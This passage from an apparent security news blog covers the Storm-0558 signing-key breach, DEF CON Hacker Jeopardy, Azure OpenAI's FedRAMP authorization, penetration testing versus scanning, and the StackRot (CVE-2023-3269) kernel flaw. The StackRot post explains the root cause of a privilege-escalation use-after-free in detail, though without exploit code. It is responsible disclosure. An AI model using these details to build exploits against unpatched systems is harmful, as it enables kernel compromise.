Even so, the latest development sheds some light on the chain of security blunders that culminated in the signing key falling into the hands of an actor with a "high degree of technical tradecraft and operational security." Microsoft tracks the hacking group under the moniker Storm-0558. The group has been linked to the breach of approximately 25 organizations, gaining unauthorized access to Outlook Web Access (OWA) and by using the stolen consumer signing key to forge tokens. Improper validation of the key, which allowed it to be trusted for signing Azure AD tokens, was identified as the root cause: the "mail system would accept a request for enterprise email using a security token signed with the consumer key." Microsoft has since resolved the issue. Evidence suggests that the malicious activity began about a month before it was discovered in June 2023.

After further investigation, cloud security company Wiz revealed in July that the stolen Microsoft consumer signing key may have been usable to gain unauthorized access to a variety of other cloud services. Microsoft, however, stated that it did not discover any additional evidence of unauthorized access to applications beyond email inboxes. It has also widened access to security logging in response to criticism that the feature was restricted to customers with Purview Audit (Premium) licenses, preventing others from accessing forensic data.
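The validation flaw, a key trusted outside its intended scope, can be illustrated with a toy signed-token scheme. This is not Microsoft's actual token format; the key names, secrets, and scopes below are invented for illustration.

```python
# Illustrative sketch: a verifier must check the *scope* a signing key is
# valid for, not just that the signature verifies. All values are invented.
import hmac, hashlib, json, base64

KEYS = {
    "consumer-key":   {"secret": b"c0nsumer-s3cret",   "scope": "consumer"},
    "enterprise-key": {"secret": b"ent3rprise-s3cret", "scope": "enterprise"},
}

def sign(payload: dict, key_id: str) -> str:
    body = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode()
    sig = hmac.new(KEYS[key_id]["secret"], body.encode(),
                   hashlib.sha256).hexdigest()
    return f"{key_id}.{body}.{sig}"

def verify(token: str, required_scope: str) -> bool:
    key_id, body, sig = token.split(".")
    key = KEYS.get(key_id)
    if key is None:
        return False
    expected = hmac.new(key["secret"], body.encode(),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False
    # The check analogous to the one missing in the incident: a
    # consumer-scoped key must not be accepted for enterprise requests.
    return key["scope"] == required_scope
```

With the scope check in place, a token signed with the consumer key verifies for consumer access but is rejected for enterprise access, which is exactly the boundary the compromised mail system failed to enforce.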

  • DEF CON 31 Hacker Jeopardy

Hacker Jeopardy: A DEF CON Tradition

For many in the hacking community, DEF CON, held annually in Las Vegas, isn't just a conference; it's a reunion. Among the many events and challenges that make DEF CON a unique experience, one stands out for its blend of knowledge, wit, and alcohol: Hacker Jeopardy.

What is Hacker Jeopardy?

Inspired by the classic TV game show "Jeopardy!", Hacker Jeopardy puts contestants' cybersecurity knowledge to the test. But there's a twist: while the format is similar, with answers provided in the form of a question, the content is all about hacking, the culture around it, and some of the inside jokes of the community.

A Blend of Fun and Knowledge

Hacker Jeopardy is notorious for its raucous atmosphere. Audience participation is encouraged, with attendees often shouting out (sometimes incorrect) answers, and even occasional playful boos. Another key element? Drinking. While not mandatory, many contestants choose to imbibe, and there's even a special category dedicated to drinking.

Culturally Significant

While on the surface it might seem like just a fun game, Hacker Jeopardy is also an important reflection of hacker culture. The questions cover a range of topics from the history of hacking, to tools, techniques, and notable figures in the community. It's a way for attendees, both new and old, to test and expand their knowledge.

Why You Should Watch or Participate

If you're attending DEF CON, Hacker Jeopardy is a must-see. Not only is it entertaining, but it's also a way to gauge your own knowledge and perhaps learn something new. For those brave enough, participating is a way to achieve a small piece of DEF CON fame.

Conclusion

Hacker Jeopardy, with its mix of humor, knowledge, and camaraderie, embodies the spirit of DEF CON. It's more than just a game; it's a celebration of hacker culture.

  • Azure OpenAI Receives FedRAMP High P-ATO

Microsoft Azure OpenAI Service has successfully obtained the U.S. Federal Risk and Authorization Management Program (FedRAMP) High Provisional Authorization to Operate (P-ATO), granted by the FedRAMP Joint Authorization Board (JAB). This significant achievement builds on the prior announcement of Azure OpenAI Service availability in commercial environments for Azure Government customers. With the FedRAMP High authorization, agencies requiring FedRAMP High can engage directly with Azure OpenAI within Azure's commercial infrastructure.

Microsoft officially unveiled its Azure OpenAI Service for governmental use in early June. The launch gives federal agencies access to robust language models operable within Microsoft's U.S. government-focused cloud service, Azure Government. The service enables government departments to tailor language models, including GPT-3 and GPT-4, for particular tasks such as content creation, summarization, semantic search, and natural language-to-code translation. Microsoft assures that Azure OpenAI Service maintains a firewall with Microsoft's corporate network and that no governmental agency data contributes to OpenAI model training.

This authorization follows an Impact Level 2 provisional authorization from the Defense Information Systems Agency. Both arrived after the Federal Trade Commission launched an inquiry into potential consumer protection violations by OpenAI. In a formal letter to OpenAI, the FTC alleged that the company employed deceptive or unfair privacy or data security practices, resulting in reputational damage. The commission dispatched the letter in response to consumers' grievances that ChatGPT propagated "false, misleading, disparaging, or harmful" information about individuals.
This milestone also aligns with several government agencies' interest in how generative artificial intelligence, the technology fueling ChatGPT, can be adapted for diverse use cases. Users can access the Azure OpenAI Service via REST APIs, the Python SDK, or Microsoft's web-based interface in the Azure AI Studio. The service is readily available to all Azure Government customers and partners. Microsoft emphasizes its commitment to safeguarding government customers' data, privacy, and security by encrypting all Azure traffic within a region or between regions using MACsec, employing the AES-128 block cipher for encryption.

Achieving the FedRAMP High authorization demonstrates conformity with the rigorous security standards the federal government imposes on cloud service providers. The authorization allows government users and developers to incorporate Azure OpenAI's foundation models, such as GPT-4, GPT-3.5, and DALL-E, into their cloud applications. The service offers high-performance AI models at production scale with unparalleled uptime.

The Azure OpenAI Service supports a myriad of use cases to aid government users in their unique missions, including capabilities to:

- Expedite content generation: Automatically produce responses to mission or project inquiries, reducing research and analysis effort and enabling teams to concentrate on higher-level decision-making and strategic tasks.
- Simplify content summarization: Generate succinct summaries of logs and facilitate quick analysis of articles, analyst reports, and field reports.
- Enhance semantic search: Refine the accuracy of search results by comprehending the intent behind a user's query.
- Provide code generation and rectification: Produce code from natural language descriptions or rectify errors in existing code.
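As a rough illustration of the REST access path, the sketch below assembles (but does not send) a chat-completions request. The endpoint, deployment name, API version, and key are placeholders, not values from this article; consult the official Azure OpenAI documentation for current ones.

```python
# Hypothetical helper that builds an Azure OpenAI chat-completions request.
# All concrete values passed in are placeholders for illustration.
def build_chat_request(endpoint, deployment, api_key, messages,
                       api_version="2024-02-01"):
    return {
        "url": (f"{endpoint}/openai/deployments/{deployment}"
                f"/chat/completions?api-version={api_version}"),
        "headers": {"api-key": api_key,
                    "Content-Type": "application/json"},
        "body": {"messages": messages},
    }

req = build_chat_request("https://example-gov.openai.azure.com",
                         "gpt-4-deployment", "<api-key>",
                         [{"role": "user", "content": "Summarize this log."}])
```

The resulting dictionary could then be handed to any HTTP client; the same call shape is what the Python SDK wraps for you.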
For secure access to Azure OpenAI Service by government tenants, we have formulated a detailed guide on establishing secure connectivity between government and commercial tenants using Azure's robust backbone. The FedRAMP High authorization underscores our relentless commitment to ensuring government agencies can access state-of-the-art AI technologies while adhering to stringent security and compliance requisites. We eagerly anticipate empowering federal agencies to transform their mission-critical operations with Azure OpenAI and unlock new insights powered by generative AI.

References
- Microsoft Azure AI P-ATO post
- Microsoft launches generative AI service for government agencies

  • StackRot (CVE-2023-3269) - Exploit Will Be Released Soon!

Vulnerability

StackRot (CVE-2023-3269) is a privilege escalation vulnerability in the Linux kernel. This disclosure complies with the linux-distros list policy and aims to provide early information about the vulnerability. While the essential details of the vulnerability are included here, complete exploit code and a comprehensive write-up will be publicly available by the end of July. The GitHub repository will be updated, and the oss-security thread will be notified accordingly.

The vulnerability, known as StackRot or "Stack Rot," affects the handling of stack expansion in Linux kernel versions 6.1 through 6.4. The issue arises in the maple tree, which manages virtual memory areas. During node replacement, the MM write lock is not properly acquired, resulting in use-after-free problems. An unprivileged local user can exploit this flaw to compromise the kernel and elevate their privileges.

StackRot impacts nearly all kernel configurations, as it is a vulnerability within the memory management subsystem of the Linux kernel, and triggering it requires minimal capabilities. However, maple nodes are freed using RCU callbacks, which delay memory deallocation until after the RCU grace period, so exploiting this vulnerability is considered challenging. To the best of current knowledge, there are no publicly available exploits targeting use-after-free-by-RCU (UAFBR) bugs. This is the first known instance where UAFBR bugs have been proven exploitable, even without CONFIG_PREEMPT or CONFIG_SLAB_MERGE_DEFAULT enabled.

Note: the StackRot vulnerability has existed in the Linux kernel since version 6.1, when the VMA tree structure transitioned from red-black trees to maple trees.

Maple Tree

The maple tree is a range-based B-tree designed to use modern processor caches efficiently while ensuring RCU (Read-Copy-Update) safety.
Its implementation offers various benefits in the Linux kernel, particularly in areas where a non-overlapping range-based tree with a straightforward interface is advantageous. If you currently use an rbtree in conjunction with other data structures to enhance performance, or an interval tree to track non-overlapping ranges, the maple tree is a suitable alternative.

The tree has a branching factor of 10 for non-leaf nodes and 16 for leaf nodes. Compared to the rbtree, the maple tree is significantly shorter, resulting in fewer cache misses. Furthermore, eliminating the linked list between consecutive entries reduces cache misses and the need to fetch the previous and next VMA (Virtual Memory Area) during various tree modifications.

The initial focus of the patch set was to apply the maple tree as a replacement for three data structures in the vm_area_struct: the augmented rbtree, the vma cache, and the linked list of VMAs in the mm_struct. The ultimate objective is to reduce or eliminate contention on the mmap_lock. The plan is to transition to using the maple tree in RCU mode, where readers do not block writers. Only one write operation is permitted at a time, and if stale data is encountered, a reader re-traverses the tree. RCU will be enabled for VMAs, and this mode will be activated once multiple tasks are using the mm_struct.

Issue - StackRot (CVE-2023-3269)

When the mmap() system call is used to establish a memory mapping in the Linux kernel, a specialized data structure called vm_area_struct is generated to represent the corresponding virtual memory area (VMA). This VMA structure serves as a container for a wide range of information, such as flags, properties, and other details directly associated with the memory mapping.
struct vm_area_struct {
    long unsigned int vm_start;                      /* 0 8 */
    long unsigned int vm_end;                        /* 8 8 */
    struct mm_struct *vm_mm;                         /* 16 8 */
    pgprot_t vm_page_prot;                           /* 24 8 */
    long unsigned int vm_flags;                      /* 32 8 */
    union {
        struct {
            struct rb_node rb __attribute__((__aligned__(8))); /* 40 24 */
            /* --- cacheline 1 boundary (64 bytes) --- */
            long unsigned int rb_subtree_last;       /* 64 8 */
        } __attribute__((__aligned__(8))) shared __attribute__((__aligned__(8))); /* 40 32 */
        struct anon_vma_name *anon_name;             /* 40 8 */
    } __attribute__((__aligned__(8)));               /* 40 32 */
    /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */
    struct list_head anon_vma_chain;                 /* 72 16 */
    struct anon_vma *anon_vma;                       /* 88 8 */
    const struct vm_operations_struct *vm_ops;       /* 96 8 */
    long unsigned int vm_pgoff;                      /* 104 8 */
    struct file *vm_file;                            /* 112 8 */
    void *vm_private_data;                           /* 120 8 */
    /* --- cacheline 2 boundary (128 bytes) --- */
    atomic_long_t swap_readahead_info;               /* 128 8 */
    struct vm_userfaultfd_ctx vm_userfaultfd_ctx;    /* 136 0 */

    /* size: 136, cachelines: 3, members: 14 */
    /* forced alignments: 1 */
    /* last cacheline: 8 bytes */
} __attribute__((__aligned__(8)));

To efficiently handle page faults and other memory-related system calls, the Linux kernel requires rapid lookup of the VMA based solely on an address. Traditionally, VMA management relied on red-black trees; starting with Linux kernel 6.1, the kernel transitioned to maple trees, RCU-safe B-tree data structures optimized for storing non-overlapping ranges. However, the introduction of maple trees added complexity to the codebase and introduced the StackRot vulnerability.

The maple tree structure consists of maple nodes. For the purposes of this discussion, assume the maple tree has a single root node, which can accommodate a maximum of 16 intervals. Each interval either represents a gap or points to a specific VMA.
Consequently, there are no holes between two intervals within the tree; even a gap is itself represented by an interval.

struct maple_range_64 {
    struct maple_pnode *parent;                      /* 0 8 */
    long unsigned int pivot[15];                     /* 8 120 */
    /* --- cacheline 2 boundary (128 bytes) --- */
    union {
        void *slot[16];                              /* 128 128 */
        struct {
            void *pad[15];                           /* 128 120 */
            /* --- cacheline 3 boundary (192 bytes) was 56 bytes ago --- */
            struct maple_metadata meta;              /* 248 2 */
        };                                           /* 128 128 */
    };                                               /* 128 128 */

    /* size: 256, cachelines: 4, members: 3 */
};

The maple_range_64 structure represents a node within the maple tree implementation. It contains pivots, which denote the boundaries of the 16 intervals, and slots, which reference the VMA (Virtual Memory Area) structures when the node is a leaf node.

The maple tree imposes certain restrictions on concurrent modification, requiring an exclusive lock for writers; for the VMA tree, this exclusive lock is the MM write lock. Readers have two options. The first is to hold the MM read lock, in which case writers are blocked by the MM read-write lock. The second is to enter an RCU critical section, which does not block writers, while readers can still proceed safely thanks to the RCU-safe nature of the maple tree. Most existing VMA accesses choose the first option; the second is employed in a few performance-critical scenarios, such as lockless page faults.

However, there is an additional aspect that requires careful consideration: stack expansion. The stack is a memory area mapped with the MAP_GROWSDOWN flag, which indicates automatic expansion when an address below the region is accessed. In such cases, the start address of the corresponding VMA and the associated interval within the maple tree are adjusted.
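To make the pivot/slot layout concrete, here is a toy Python model (an illustration, not kernel code) of how a leaf node resolves an address: pivots mark the upper bounds of the intervals, and a slot holding None stands in for a gap such as the stack guard.

```python
# Toy model of a maple leaf node: `pivots` are interval upper bounds,
# `slots` hold either a VMA (represented by a string) or None for a gap.
class MapleLeaf:
    def __init__(self, pivots, slots):
        # In maple_range_64 there are 15 pivots for 16 slots; in general,
        # one more slot than pivots.
        assert len(slots) == len(pivots) + 1
        self.pivots = pivots   # sorted upper bounds of each interval
        self.slots = slots

    def lookup(self, addr):
        """Return the entry whose interval contains `addr`."""
        for i, pivot in enumerate(self.pivots):
            if addr <= pivot:
                return self.slots[i]
        return self.slots[-1]  # addr falls in the last interval

# Two mappings with a guard gap between them (addresses are invented):
leaf = MapleLeaf(pivots=[0x3fff, 0x4fff, 0x7fff],
                 slots=["vma_heap", None, "vma_stack", None])
```

Looking up 0x1000 lands in "vma_heap", 0x4800 lands in the gap (None), and 0x7000 lands in "vma_stack"; this is the lookup the kernel performs on every page fault.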
Notably, these adjustments are performed without holding the MM write lock.

static inline void
do_user_addr_fault(struct pt_regs *regs,
                   unsigned long error_code,
                   unsigned long address)
{
    // ...
    if (unlikely(!mmap_read_trylock(mm))) {
        // ...
    }
    // ...
    if (unlikely(expand_stack(vma, address))) {
        // ...
    }
    // ...
}

In the Linux kernel, a stack guard is normally enforced to create a gap between the stack Virtual Memory Area (VMA) and its adjacent VMA. When expanding the stack, the pivot value in the maple node can be updated atomically, given the presence of this gap. However, if the neighboring VMA also has the MAP_GROWSDOWN flag, no stack guard is enforced, and the stack expansion can eliminate the existing gap. In that case, the interval within the maple node corresponding to the gap must be removed.

int expand_downwards(struct vm_area_struct *vma, unsigned long address)
{
    // ...
    if (prev) {
        if (!(prev->vm_flags & VM_GROWSDOWN) &&
            vma_is_accessible(prev) &&
            (address - prev->vm_end < stack_guard_gap))
            return -ENOMEM;
    }
    // ...
}

Since the maple tree implementation in the kernel is RCU-safe, the existing node cannot be overwritten in place. Instead, a new node is created, triggering node replacement, and the old node is subsequently destroyed via an RCU callback. This ensures safe and efficient handling of node updates within the maple tree.

The problem lies with the RCU callback, which is invoked only after all pre-existing RCU critical sections have completed. When accessing VMAs, however, only the MM read lock is held; the accessor does not enter an RCU critical section. The RCU callback can therefore be invoked at any time, potentially freeing the old maple node while it is still in use.
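The guard-gap rule in expand_downwards() can be restated as a small predicate. The Python sketch below is an illustration, not kernel logic; the flag value matches the kernel's VM_GROWSDOWN, and the gap size mirrors the kernel default of 256 pages.

```python
# Toy model of the expand_downwards() guard check: expansion is refused
# only when the previous mapping is an accessible non-GROWSDOWN VMA that
# sits inside the guard gap. Addresses below are invented.
VM_GROWSDOWN = 0x00000100          # flag value as in the kernel headers
STACK_GUARD_GAP = 256 * 4096       # kernel default: 256 pages of 4 KiB

def may_expand_down(new_start, prev_end, prev_flags, prev_accessible=True):
    """Return True if the stack may grow down to `new_start`."""
    if (not (prev_flags & VM_GROWSDOWN) and prev_accessible
            and (new_start - prev_end < STACK_GUARD_GAP)):
        return False               # would violate the stack guard gap
    return True                    # gap respected, or neighbor also grows down
```

The interesting case for StackRot is the one where the check passes because the neighbor also has VM_GROWSDOWN set: the gap interval must then be removed from the maple node, which forces the node replacement described next.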
However, pointers to the old node may already have been obtained, resulting in a use-after-free bug when they are subsequently dereferenced. The full report includes a backtrace of the specific location where the use-after-free (UAF) occurs.

Remediation

On June 15th, I responsibly reported this vulnerability to the Linux kernel security team. Given its complexity, Linus Torvalds led the process of addressing the bug. It took nearly two weeks to develop a series of patches that received consensus and were deemed suitable for resolving the issue. On June 28th, during the merge window for Linux kernel 6.5, the fix was merged into Linus' tree, with a detailed merge message offering technical insight into the patch series and its implementation. The patches were then backported to the stable kernels 6.1.37, 6.3.11, and 6.4.1, so the "Stack Rot" bug was effectively addressed and resolved on July 1st.

References
- Fix merged into Linus' tree
- The updated 6.1.y, 6.3.y, and 6.4.y git trees: git:// linux-6.1.y, git:// linux-6.3.y, git:// linux-6.4.y

Credit
@lrh2000 - Ruihan Li
@sochotnicky - Stanislav Ochotnický

  • Penetration testing vs vulnerability scanning

Penetration testing vs vulnerability scanning: the dynamic duo of cybersecurity techniques.

Ah, the age-old battle of penetration testing vs vulnerability scanning! It's like choosing between a stealthy ninja and a tech-savvy wizard to safeguard your precious business assets. Hold on, though: these two have different responsibilities in the field of cybersecurity and are more than willing to work together to take down some cyber bad guys.

Penetration Testing or "PenTest" Services

Our first contender is the agile and brave penetration test. Imagine a skilled white-hat hacker unleashing their inner bad guy to examine your systems for potential vulnerabilities. But don't worry, it's all for security; they aren't trying to cause trouble! These reputable experts, referred to as pentesters, simulate genuine cyberattacks without inflicting any harm. They act as digital detectives on a quest to identify weaknesses and fix them before the actual bad guys have a chance to take advantage of them.

Now, you might be wondering why so many companies choose to contract out penetration testing. Well, for starters, an outsider brings new perspectives and unbiased eyes. Additionally, hiring full-time, specialized security personnel can be as challenging as solving a Rubik's cube while blindfolded. Outsourcing your security needs to knowledgeable professionals who regularly conduct risk assessments and pen tests is like having a superhero squad on speed dial!

The catch is that penetration testers can't just unwind with a bowl of popcorn. They aren't couch potatoes; their work is hands-on! While they do employ certain handy security technologies, their magic can't be fully automated. They use manual tools for testing and vulnerability assessment, such as Metasploit, and they even practice the fine art of social engineering, which includes a little phishing.
Hey, whatever it takes to determine how security-savvy your personnel are!

Vulnerability Scanning

Vulnerability scanning, on the other hand, acts as your dependable automated companion, constantly ready to step in and keep things under control. It is like having a vigilant security robot scour your network for known problems and potential dangers. This tool-driven method works perfectly for routine checks throughout the software development lifecycle. The key is finding those recurring problems and shooing them away before they become serious.

Of course, not every vulnerability scanner is the same; some are simple signature-based sniffers, while others go as far as automated penetration testing. Consider those tech-savvy daredevils who attempt attacks like their pentesting brethren. But keep in mind that manual testing still guards against a distinct range of vulnerabilities: the ones automation cannot find on its own. It's as if pentesters have X-ray vision to penetrate your software's layers and reveal undiscovered bugs!

How frequently should we throw parties for these heroes? Like an all-access card to a VIP party, vulnerability assessments are welcome wherever and whenever they are conducted. There are no restrictions on how frequently they may be executed, so you can schedule them whenever necessary. Just be aware of their resource-hungry nature and show them some love during off-peak hours.

Penetration tests, on the other hand, are like the main performers at a prestigious gala. They take a lot of time, money, and resources, so having them available all the time is not viable. Instead, a few award-winning performances annually, or at key moments, will keep your defenses honed and ready at all times.

But hey, don't let the supposed rivalry between these two champs fool you. Like peanut butter and jelly, they go together well and even give you extra options to up your security game. Rewards, anyone?
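A signature-based scanner, at its simplest, just matches what a service announces about itself against a list of known-bad versions. The sketch below is a hypothetical illustration: the product names, banners, and vulnerability descriptions are all invented.

```python
# Minimal sketch of signature-based vulnerability scanning: match a
# service banner against known-vulnerable version strings.
# All signatures and banners here are invented for illustration.
import re

SIGNATURES = {
    r"ExampleFTP/1\.(0|1)\b": "ExampleFTP 1.0-1.1: anonymous write (hypothetical)",
    r"OldSSH/2\.3\b":         "OldSSH 2.3: auth bypass (hypothetical)",
}

def match_banner(banner):
    """Return descriptions of every signature the banner matches."""
    return [desc for pattern, desc in SIGNATURES.items()
            if re.search(pattern, banner)]
```

A banner like "220 ExampleFTP/1.1 ready" trips the first signature, while "220 ExampleFTP/2.0 ready" passes clean; the scanner's coverage is only ever as good as its signature list, which is exactly why manual testing still matters.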
Freelance ethical hackers can join the game and try to get past your defenses in exchange for a reward, a bug bounty. Hunt for treasure! But keep in mind that bounties are like the icing on the cake, a welcome addition but not a replacement for routine penetration tests.

But in Addition: How Does Threat Modeling Unravel Cyber Mysteries for Penetration Testers?

Ah, threat modeling, a phrase that sends shivers down the spines of the uninitiated. Do not worry, though, for it is not as enigmatic as it seems! Imagine yourself as a detective, hunting out any potential threat that may hurt a company, a target network, or a tasty in-scope application. Penetration testers, as architects of controlled chaos, outline these dangers to direct their nefarious actions during a penetration test. Oh, and we also use this information, like seasoned cybersecurity soothsayers, to rank the dangers associated with the vulnerabilities we find!

Threat modeling may be as informal as a mental checklist used in the preliminary phases of an assessment, or as formal as a written methodology that companies use to make wise decisions. But regardless of the style, it's a dance we must perform. When we communicate the findings to our stakeholders, it gives context to the vulnerabilities and exploits we uncover during our sly activities, making the outcomes more tangible and plausible.

We can use the following questions from Wikipedia to aid our investigation:

- Where am I most at risk of being attacked?
- What dangers are most important?
- What must I do to protect myself from these dangers?

To answer these questions is to solve an exciting cybercrime. It's a process that can help an organization better recognize risk so it can implement preventative measures and controls, a digital fortification! We don't merely hack into networks or steal sensitive data and call it a day when we go out on our penetration testing expeditions.
Oh no, our clients give us very precise objectives. Our goal is to locate all potential vulnerabilities, exploit them, and determine the real scope of the hazards they entail. No capture-the-flag shortcuts here! Threat modeling plays a key role in helping us understand the hazards ready to pounce on unaware victims before we can properly estimate risks. Like the hackers in the movies, we intrepid penetration testers aim to imitate genuine attackers in order to expose the real threats to our targets. Our whole testing approach is based on an understanding of the dangers a target application faces. It's like discovering the contents of a carefully guarded cyber treasure trove!

Conclusion, The End, Finito!

So there you have it: vulnerability scanning and penetration testing, the dynamic duo of cybersecurity. They collaborate well, protecting your digital castle and making sure those annoying cybercriminals never stand a chance. So let them collaborate, play to their strengths, and turn your company into an unstoppable force online! You now know about the fascinating area of threat modeling and how important it is to our evaluations. It is woven through every task we carry out and is a crucial component of our trade. In fact, many businesses may already be doing it without even recognizing it! Please get in touch if you have any questions about this cyber-sleuthing procedure or how it relates to our penetration testing adventures. We're always up for an engaging online conversation!
